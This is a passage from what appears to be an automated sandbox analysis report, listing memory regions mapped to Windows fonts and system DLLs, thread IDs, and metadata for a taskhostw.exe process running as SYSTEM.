id = 1895
start_va = 0x5d0000
end_va = 0x5e4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudosb.ttf"
filename = "\\Windows\\Fonts\\GOUDOSB.TTF" (normalized: "c:\\windows\\fonts\\goudosb.ttf")
Region:
id = 1896
start_va = 0xbb0000
end_va = 0xbc3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudosi.ttf"
filename = "\\Windows\\Fonts\\GOUDOSI.TTF" (normalized: "c:\\windows\\fonts\\goudosi.ttf")
Region:
id = 1897
start_va = 0x5f0000
end_va = 0x5fdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudysto.ttf"
filename = "\\Windows\\Fonts\\GOUDYSTO.TTF" (normalized: "c:\\windows\\fonts\\goudysto.ttf")
Region:
id = 1898
start_va = 0x4660000
end_va = 0x475ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004660000"
filename = ""
Region:
id = 1899
start_va = 0x7ff9f0ab0000
end_va = 0x7ff9f0ab9fff
monitored = 0
entry_point = 0x7ff9f0ab14c0
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1900
start_va = 0x8c0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "harlowsi.ttf"
filename = "\\Windows\\Fonts\\HARLOWSI.TTF" (normalized: "c:\\windows\\fonts\\harlowsi.ttf")
Region:
id = 1901
start_va = 0x8e0000
end_va = 0x8f1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "harngton.ttf"
filename = "\\Windows\\Fonts\\HARNGTON.TTF" (normalized: "c:\\windows\\fonts\\harngton.ttf")
Region:
id = 1902
start_va = 0xb90000
end_va = 0xbaafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "hatten.ttf"
filename = "\\Windows\\Fonts\\HATTEN.TTF" (normalized: "c:\\windows\\fonts\\hatten.ttf")
Region:
id = 1903
start_va = 0x7ff9f7430000
end_va = 0x7ff9f7453fff
monitored = 0
entry_point = 0x7ff9f7433260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1904
start_va = 0xbd0000
end_va = 0xbe6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "htowert.ttf"
filename = "\\Windows\\Fonts\\HTOWERT.TTF" (normalized: "c:\\windows\\fonts\\htowert.ttf")
Region:
id = 1905
start_va = 0xd00000
end_va = 0xd12fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "htowerti.ttf"
filename = "\\Windows\\Fonts\\HTOWERTI.TTF" (normalized: "c:\\windows\\fonts\\htowerti.ttf")
Region:
id = 1907
start_va = 0xbf0000
end_va = 0xbfefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imprisha.ttf"
filename = "\\Windows\\Fonts\\IMPRISHA.TTF" (normalized: "c:\\windows\\fonts\\imprisha.ttf")
Region:
id = 1908
start_va = 0xd20000
end_va = 0xd32fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "infroman.ttf"
filename = "\\Windows\\Fonts\\INFROMAN.TTF" (normalized: "c:\\windows\\fonts\\infroman.ttf")
Region:
id = 1909
start_va = 0xd40000
end_va = 0xd60fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itcblkad.ttf"
filename = "\\Windows\\Fonts\\ITCBLKAD.TTF" (normalized: "c:\\windows\\fonts\\itcblkad.ttf")
Region:
id = 1910
start_va = 0x560000
end_va = 0x56ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itcedscr.ttf"
filename = "\\Windows\\Fonts\\ITCEDSCR.TTF" (normalized: "c:\\windows\\fonts\\itcedscr.ttf")
Region:
id = 1911
start_va = 0x570000
end_va = 0x57efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "itckrist.ttf"
filename = "\\Windows\\Fonts\\ITCKRIST.TTF" (normalized: "c:\\windows\\fonts\\itckrist.ttf")
Region:
id = 1912
start_va = 0x5b0000
end_va = 0x5c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "jokerman.ttf"
filename = "\\Windows\\Fonts\\JOKERMAN.TTF" (normalized: "c:\\windows\\fonts\\jokerman.ttf")
Region:
id = 1913
start_va = 0x580000
end_va = 0x58ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "juice___.ttf"
filename = "\\Windows\\Fonts\\JUICE___.TTF" (normalized: "c:\\windows\\fonts\\juice___.ttf")
Region:
id = 1914
start_va = 0x5d0000
end_va = 0x5dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kunstler.ttf"
filename = "\\Windows\\Fonts\\KUNSTLER.TTF" (normalized: "c:\\windows\\fonts\\kunstler.ttf")
Region:
id = 1926
start_va = 0x5e0000
end_va = 0x5eafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "latinwd.ttf"
filename = "\\Windows\\Fonts\\LATINWD.TTF" (normalized: "c:\\windows\\fonts\\latinwd.ttf")
Region:
id = 1927
start_va = 0x8e0000
end_va = 0x8f1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbrite.ttf"
filename = "\\Windows\\Fonts\\LBRITE.TTF" (normalized: "c:\\windows\\fonts\\lbrite.ttf")
Region:
id = 1928
start_va = 0xbb0000
end_va = 0xbc0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbrited.ttf"
filename = "\\Windows\\Fonts\\LBRITED.TTF" (normalized: "c:\\windows\\fonts\\lbrited.ttf")
Region:
id = 1929
start_va = 0xd70000
end_va = 0xd81fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbritedi.ttf"
filename = "\\Windows\\Fonts\\LBRITEDI.TTF" (normalized: "c:\\windows\\fonts\\lbritedi.ttf")
Region:
id = 1930
start_va = 0xd90000
end_va = 0xda1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lbritei.ttf"
filename = "\\Windows\\Fonts\\LBRITEI.TTF" (normalized: "c:\\windows\\fonts\\lbritei.ttf")
Region:
id = 1931
start_va = 0x5f0000
end_va = 0x5fdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lcallig.ttf"
filename = "\\Windows\\Fonts\\LCALLIG.TTF" (normalized: "c:\\windows\\fonts\\lcallig.ttf")
Region:
id = 1932
start_va = 0xdb0000
end_va = 0xdc6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "leelawad.ttf"
filename = "\\Windows\\Fonts\\LEELAWAD.TTF" (normalized: "c:\\windows\\fonts\\leelawad.ttf")
Region:
id = 1933
start_va = 0xb90000
end_va = 0xba6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "leelawdb.ttf"
filename = "\\Windows\\Fonts\\LEELAWDB.TTF" (normalized: "c:\\windows\\fonts\\leelawdb.ttf")
Region:
id = 1934
start_va = 0x8c0000
end_va = 0x8cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfax.ttf"
filename = "\\Windows\\Fonts\\LFAX.TTF" (normalized: "c:\\windows\\fonts\\lfax.ttf")
Region:
id = 1935
start_va = 0xbd0000
end_va = 0xbdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxd.ttf"
filename = "\\Windows\\Fonts\\LFAXD.TTF" (normalized: "c:\\windows\\fonts\\lfaxd.ttf")
Region:
id = 1936
start_va = 0x560000
end_va = 0x571fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxdi.ttf"
filename = "\\Windows\\Fonts\\LFAXDI.TTF" (normalized: "c:\\windows\\fonts\\lfaxdi.ttf")
Region:
id = 1937
start_va = 0x5b0000
end_va = 0x5c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lfaxi.ttf"
filename = "\\Windows\\Fonts\\LFAXI.TTF" (normalized: "c:\\windows\\fonts\\lfaxi.ttf")
Region:
id = 1938
start_va = 0xbe0000
end_va = 0xbeffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsans.ttf"
filename = "\\Windows\\Fonts\\LSANS.TTF" (normalized: "c:\\windows\\fonts\\lsans.ttf")
Region:
id = 1939
start_va = 0xbf0000
end_va = 0xbfefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansd.ttf"
filename = "\\Windows\\Fonts\\LSANSD.TTF" (normalized: "c:\\windows\\fonts\\lsansd.ttf")
Region:
id = 1940
start_va = 0xd00000
end_va = 0xd10fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansdi.ttf"
filename = "\\Windows\\Fonts\\LSANSDI.TTF" (normalized: "c:\\windows\\fonts\\lsansdi.ttf")
Region:
id = 1941
start_va = 0xd20000
end_va = 0xd2ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "lsansi.ttf"
filename = "\\Windows\\Fonts\\LSANSI.TTF" (normalized: "c:\\windows\\fonts\\lsansi.ttf")
Region:
id = 1942
start_va = 0x5d0000
end_va = 0x5ddfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltype.ttf"
filename = "\\Windows\\Fonts\\LTYPE.TTF" (normalized: "c:\\windows\\fonts\\ltype.ttf")
Region:
id = 1943
start_va = 0x5e0000
end_va = 0x5ecfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypeb.ttf"
filename = "\\Windows\\Fonts\\LTYPEB.TTF" (normalized: "c:\\windows\\fonts\\ltypeb.ttf")
Region:
id = 1944
start_va = 0x5f0000
end_va = 0x5fdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypebo.ttf"
filename = "\\Windows\\Fonts\\LTYPEBO.TTF" (normalized: "c:\\windows\\fonts\\ltypebo.ttf")
Region:
id = 1945
start_va = 0x8c0000
end_va = 0x8cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ltypeo.ttf"
filename = "\\Windows\\Fonts\\LTYPEO.TTF" (normalized: "c:\\windows\\fonts\\ltypeo.ttf")
Region:
id = 1946
start_va = 0x8e0000
end_va = 0x8effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "magnetob.ttf"
filename = "\\Windows\\Fonts\\MAGNETOB.TTF" (normalized: "c:\\windows\\fonts\\magnetob.ttf")
Region:
id = 1947
start_va = 0x8f0000
end_va = 0x8fefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "maian.ttf"
filename = "\\Windows\\Fonts\\MAIAN.TTF" (normalized: "c:\\windows\\fonts\\maian.ttf")
Region:
id = 1948
start_va = 0xb90000
end_va = 0xb9cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "maturasc.ttf"
filename = "\\Windows\\Fonts\\MATURASC.TTF" (normalized: "c:\\windows\\fonts\\maturasc.ttf")
Region:
id = 1949
start_va = 0xba0000
end_va = 0xbcefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mistral.ttf"
filename = "\\Windows\\Fonts\\MISTRAL.TTF" (normalized: "c:\\windows\\fonts\\mistral.ttf")
Region:
id = 1950
start_va = 0xd30000
end_va = 0xd3ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mod20.ttf"
filename = "\\Windows\\Fonts\\MOD20.TTF" (normalized: "c:\\windows\\fonts\\mod20.ttf")
Region:
id = 1951
start_va = 0xd40000
end_va = 0xd78fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msuighub.ttf"
filename = "\\Windows\\Fonts\\MSUIGHUB.TTF" (normalized: "c:\\windows\\fonts\\msuighub.ttf")
Region:
id = 1952
start_va = 0xd80000
end_va = 0xdb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msuighur.ttf"
filename = "\\Windows\\Fonts\\MSUIGHUR.TTF" (normalized: "c:\\windows\\fonts\\msuighur.ttf")
Region:
id = 1953
start_va = 0xdc0000
end_va = 0xde6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mtcorsva.ttf"
filename = "\\Windows\\Fonts\\MTCORSVA.TTF" (normalized: "c:\\windows\\fonts\\mtcorsva.ttf")
Region:
id = 1954
start_va = 0x560000
end_va = 0x577fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "niageng.ttf"
filename = "\\Windows\\Fonts\\NIAGENG.TTF" (normalized: "c:\\windows\\fonts\\niageng.ttf")
Region:
id = 1955
start_va = 0x5b0000
end_va = 0x5c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "niagsol.ttf"
filename = "\\Windows\\Fonts\\NIAGSOL.TTF" (normalized: "c:\\windows\\fonts\\niagsol.ttf")
Region:
id = 1956
start_va = 0x580000
end_va = 0x58dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ocraext.ttf"
filename = "\\Windows\\Fonts\\OCRAEXT.TTF" (normalized: "c:\\windows\\fonts\\ocraext.ttf")
Region:
id = 1957
start_va = 0xbd0000
end_va = 0xbe6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oldengl.ttf"
filename = "\\Windows\\Fonts\\OLDENGL.TTF" (normalized: "c:\\windows\\fonts\\oldengl.ttf")
Region:
id = 1958
start_va = 0xd00000
end_va = 0xd13fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "onyx.ttf"
filename = "\\Windows\\Fonts\\ONYX.TTF" (normalized: "c:\\windows\\fonts\\onyx.ttf")
Region:
id = 1959
start_va = 0xbf0000
end_va = 0xbf4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "outlook.ttf"
filename = "\\Windows\\Fonts\\OUTLOOK.TTF" (normalized: "c:\\windows\\fonts\\outlook.ttf")
Region:
id = 1960
start_va = 0xdf0000
end_va = 0xdfcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "palscri.ttf"
filename = "\\Windows\\Fonts\\PALSCRI.TTF" (normalized: "c:\\windows\\fonts\\palscri.ttf")
Region:
id = 1961
start_va = 0x1100000
end_va = 0x1127fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "papyrus.ttf"
filename = "\\Windows\\Fonts\\PAPYRUS.TTF" (normalized: "c:\\windows\\fonts\\papyrus.ttf")
Region:
id = 1962
start_va = 0x1130000
end_va = 0x1154fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "parchm.ttf"
filename = "\\Windows\\Fonts\\PARCHM.TTF" (normalized: "c:\\windows\\fonts\\parchm.ttf")
Region:
id = 1963
start_va = 0x5d0000
end_va = 0x5defff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "per_____.ttf"
filename = "\\Windows\\Fonts\\PER_____.TTF" (normalized: "c:\\windows\\fonts\\per_____.ttf")
Region:
id = 1964
start_va = 0x5e0000
end_va = 0x5eefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "perb____.ttf"
filename = "\\Windows\\Fonts\\PERB____.TTF" (normalized: "c:\\windows\\fonts\\perb____.ttf")
Region:
id = 1966
start_va = 0x560000
end_va = 0x572fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "perbi___.ttf"
filename = "\\Windows\\Fonts\\PERBI___.TTF" (normalized: "c:\\windows\\fonts\\perbi___.ttf")
Region:
id = 1970
start_va = 0x580000
end_va = 0x58bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pertibd.ttf"
filename = "\\Windows\\Fonts\\PERTIBD.TTF" (normalized: "c:\\windows\\fonts\\pertibd.ttf")
Region:
id = 1971
start_va = 0x5f0000
end_va = 0x5fafff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pertili.ttf"
filename = "\\Windows\\Fonts\\PERTILI.TTF" (normalized: "c:\\windows\\fonts\\pertili.ttf")
Region:
id = 1972
start_va = 0x8c0000
end_va = 0x8cbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "playbill.ttf"
filename = "\\Windows\\Fonts\\PLAYBILL.TTF" (normalized: "c:\\windows\\fonts\\playbill.ttf")
Region:
id = 1976
start_va = 0x8e0000
end_va = 0x8f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "poorich.ttf"
filename = "\\Windows\\Fonts\\POORICH.TTF" (normalized: "c:\\windows\\fonts\\poorich.ttf")
Region:
id = 1977
start_va = 0xb90000
end_va = 0xba4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "pristina.ttf"
filename = "\\Windows\\Fonts\\PRISTINA.TTF" (normalized: "c:\\windows\\fonts\\pristina.ttf")
Region:
id = 1980
start_va = 0x560000
end_va = 0x580fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rage.ttf"
filename = "\\Windows\\Fonts\\RAGE.TTF" (normalized: "c:\\windows\\fonts\\rage.ttf")
Region:
id = 1981
start_va = 0x5b0000
end_va = 0x5c2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ravie.ttf"
filename = "\\Windows\\Fonts\\RAVIE.TTF" (normalized: "c:\\windows\\fonts\\ravie.ttf")
Region:
id = 2006
start_va = 0x4760000
end_va = 0x485ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004760000"
filename = ""
Region:
id = 2007
start_va = 0xb90000
end_va = 0xbc5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "refsan.ttf"
filename = "\\Windows\\Fonts\\REFSAN.TTF" (normalized: "c:\\windows\\fonts\\refsan.ttf")
Region:
id = 2008
start_va = 0x560000
end_va = 0x56dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "refspcl.ttf"
filename = "\\Windows\\Fonts\\REFSPCL.TTF" (normalized: "c:\\windows\\fonts\\refspcl.ttf")
Region:
id = 2009
start_va = 0x7ff9f07b0000
end_va = 0x7ff9f07ccfff
monitored = 0
entry_point = 0x7ff9f07b6190
region_type = mapped_file
name = "wdi.dll"
filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")
Region:
id = 2010
start_va = 0x570000
end_va = 0x57dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rocc____.ttf"
filename = "\\Windows\\Fonts\\ROCC____.TTF" (normalized: "c:\\windows\\fonts\\rocc____.ttf")
Region:
id = 2011
start_va = 0x580000
end_va = 0x58efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "roccb___.ttf"
filename = "\\Windows\\Fonts\\ROCCB___.TTF" (normalized: "c:\\windows\\fonts\\roccb___.ttf")
Region:
id = 2012
start_va = 0x5d0000
end_va = 0x5e1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rock.ttf"
filename = "\\Windows\\Fonts\\ROCK.TTF" (normalized: "c:\\windows\\fonts\\rock.ttf")
Region:
id = 2013
start_va = 0x8e0000
end_va = 0x8f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockb.ttf"
filename = "\\Windows\\Fonts\\ROCKB.TTF" (normalized: "c:\\windows\\fonts\\rockb.ttf")
Region:
id = 2014
start_va = 0xbd0000
end_va = 0xbe1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockbi.ttf"
filename = "\\Windows\\Fonts\\ROCKBI.TTF" (normalized: "c:\\windows\\fonts\\rockbi.ttf")
Region:
id = 2019
start_va = 0x5f0000
end_va = 0x5fcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rockeb.ttf"
filename = "\\Windows\\Fonts\\ROCKEB.TTF" (normalized: "c:\\windows\\fonts\\rockeb.ttf")
Region:
id = 2020
start_va = 0xd00000
end_va = 0xd12fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "rocki.ttf"
filename = "\\Windows\\Fonts\\ROCKI.TTF" (normalized: "c:\\windows\\fonts\\rocki.ttf")
Region:
id = 2022
start_va = 0xd20000
end_va = 0xd49fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbkb.ttf"
filename = "\\Windows\\Fonts\\SCHLBKB.TTF" (normalized: "c:\\windows\\fonts\\schlbkb.ttf")
Region:
id = 2023
start_va = 0xd50000
end_va = 0xd77fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbkbi.ttf"
filename = "\\Windows\\Fonts\\SCHLBKBI.TTF" (normalized: "c:\\windows\\fonts\\schlbkbi.ttf")
Region:
id = 2026
start_va = 0xd80000
end_va = 0xda7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schlbki.ttf"
filename = "\\Windows\\Fonts\\SCHLBKI.TTF" (normalized: "c:\\windows\\fonts\\schlbki.ttf")
Region:
id = 2027
start_va = 0x8c0000
end_va = 0x8cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "scriptbl.ttf"
filename = "\\Windows\\Fonts\\SCRIPTBL.TTF" (normalized: "c:\\windows\\fonts\\scriptbl.ttf")
Region:
id = 2046
start_va = 0x5b0000
end_va = 0x5bcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "showg.ttf"
filename = "\\Windows\\Fonts\\SHOWG.TTF" (normalized: "c:\\windows\\fonts\\showg.ttf")
Region:
id = 2047
start_va = 0x5c0000
end_va = 0x5cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "snap____.ttf"
filename = "\\Windows\\Fonts\\SNAP____.TTF" (normalized: "c:\\windows\\fonts\\snap____.ttf")
Region:
id = 2048
start_va = 0xb90000
end_va = 0xb9dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stencil.ttf"
filename = "\\Windows\\Fonts\\STENCIL.TTF" (normalized: "c:\\windows\\fonts\\stencil.ttf")
Region:
id = 2051
start_va = 0xba0000
end_va = 0xbb2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcb_____.ttf"
filename = "\\Windows\\Fonts\\TCB_____.TTF" (normalized: "c:\\windows\\fonts\\tcb_____.ttf")
Region:
id = 2052
start_va = 0xdb0000
end_va = 0xdc2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcbi____.ttf"
filename = "\\Windows\\Fonts\\TCBI____.TTF" (normalized: "c:\\windows\\fonts\\tcbi____.ttf")
Region:
id = 2055
start_va = 0xdd0000
end_va = 0xde0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tccb____.ttf"
filename = "\\Windows\\Fonts\\TCCB____.TTF" (normalized: "c:\\windows\\fonts\\tccb____.ttf")
Region:
id = 2056
start_va = 0x1100000
end_va = 0x1112fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcceb.ttf"
filename = "\\Windows\\Fonts\\TCCEB.TTF" (normalized: "c:\\windows\\fonts\\tcceb.ttf")
Region:
id = 2058
start_va = 0x560000
end_va = 0x570fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tccm____.ttf"
filename = "\\Windows\\Fonts\\TCCM____.TTF" (normalized: "c:\\windows\\fonts\\tccm____.ttf")
Region:
id = 2059
start_va = 0x5d0000
end_va = 0x5e2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcm_____.ttf"
filename = "\\Windows\\Fonts\\TCM_____.TTF" (normalized: "c:\\windows\\fonts\\tcm_____.ttf")
Region:
id = 2062
start_va = 0x8e0000
end_va = 0x8f3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tcmi____.ttf"
filename = "\\Windows\\Fonts\\TCMI____.TTF" (normalized: "c:\\windows\\fonts\\tcmi____.ttf")
Region:
id = 2063
start_va = 0xbc0000
end_va = 0xbd2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tempsitc.ttf"
filename = "\\Windows\\Fonts\\TEMPSITC.TTF" (normalized: "c:\\windows\\fonts\\tempsitc.ttf")
Region:
id = 2067
start_va = 0xbe0000
end_va = 0xbf9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vineritc.ttf"
filename = "\\Windows\\Fonts\\VINERITC.TTF" (normalized: "c:\\windows\\fonts\\vineritc.ttf")
Region:
id = 2068
start_va = 0xd00000
end_va = 0xd10fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vivaldii.ttf"
filename = "\\Windows\\Fonts\\VIVALDII.TTF" (normalized: "c:\\windows\\fonts\\vivaldii.ttf")
Region:
id = 2069
start_va = 0x580000
end_va = 0x58dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vladimir.ttf"
filename = "\\Windows\\Fonts\\VLADIMIR.TTF" (normalized: "c:\\windows\\fonts\\vladimir.ttf")
Region:
id = 2070
start_va = 0xd20000
end_va = 0xd30fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingdng2.ttf"
filename = "\\Windows\\Fonts\\WINGDNG2.TTF" (normalized: "c:\\windows\\fonts\\wingdng2.ttf")
Region:
id = 2073
start_va = 0x5b0000
end_va = 0x5b8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wingdng3.ttf"
filename = "\\Windows\\Fonts\\WINGDNG3.TTF" (normalized: "c:\\windows\\fonts\\wingdng3.ttf")
Region:
id = 2074
start_va = 0x5c0000
end_va = 0x5c1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mtextra.ttf"
filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\equation\\mtextra.ttf")
Region:
id = 2075
start_va = 0x5f0000
end_va = 0x5f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "marlett.ttf"
filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf")
Thread:
id = 137
os_tid = 0x538
Thread:
id = 138
os_tid = 0x514
Thread:
id = 139
os_tid = 0x480
Thread:
id = 140
os_tid = 0x2e0
Thread:
id = 141
os_tid = 0x15c
Thread:
id = 142
os_tid = 0x164
Thread:
id = 143
os_tid = 0x160
Thread:
id = 144
os_tid = 0x3dc
Thread:
id = 145
os_tid = 0x3d8
Thread:
id = 146
os_tid = 0x3d4
Thread:
id = 147
os_tid = 0x3c0
Thread:
id = 148
os_tid = 0x3b8
Thread:
id = 149
os_tid = 0x53c
Thread:
id = 150
os_tid = 0x540
Thread:
id = 151
os_tid = 0x544
Thread:
id = 152
os_tid = 0x548
Thread:
id = 154
os_tid = 0x55c
Thread:
id = 156
os_tid = 0x57c
Thread:
id = 157
os_tid = 0x5a0
Thread:
id = 162
os_tid = 0x628
Process:
id = "8"
image_name = "taskhostw.exe"
filename = "c:\\windows\\system32\\taskhostw.exe"
page_root = "0x5304b000"
os_pid = "0x568"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0x3e4"
cmd_line = "taskhostw.exe TpmTasks"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d383" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 1826
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1827
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1828
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 1829
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1830
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 1831
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1832
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1833
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
